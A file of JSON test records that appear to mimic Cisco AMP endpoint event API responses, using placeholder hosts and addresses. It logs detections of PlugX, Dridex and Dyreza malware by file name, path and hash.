-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841158","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55725,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841157","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55724,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841156","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55723,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841154","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55721,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333324762873857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55720,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":912000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960835","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":1428,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":162000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960834","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX1\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3596,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907648182026000,"timestamp":1610705261,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:07:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907648182026241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209700347052000,"timestamp":1610705254,"timestamp_nanoseconds":882000000,"date":"2021-01-15T10:07:34+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209700347052056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256485970936000,"timestamp":1610705253,"timestamp_nanoseconds":307000000,"date":"2021-01-15T10:07:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256485970935854","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209670282281000,"timestamp":1610705247,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:07:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209670282280983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256434431328000,"timestamp":1610705241,"timestamp_nanoseconds":295000000,"date":"2021-01-15T10:07:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256434431328301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900178000400,"timestamp":1610705238,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:07:18+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"GenericKD:Dyreza-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705238,"start_date":"2021-01-15T10:07:18+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb"},"parent":{"disposition":"Malicious","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209605857772000,"timestamp":1610705232,"timestamp_nanoseconds":855000000,"date":"2021-01-15T10:07:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209605857771542","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":358000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655340","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":343000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":280000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":249000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":890000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688040","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688039","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} 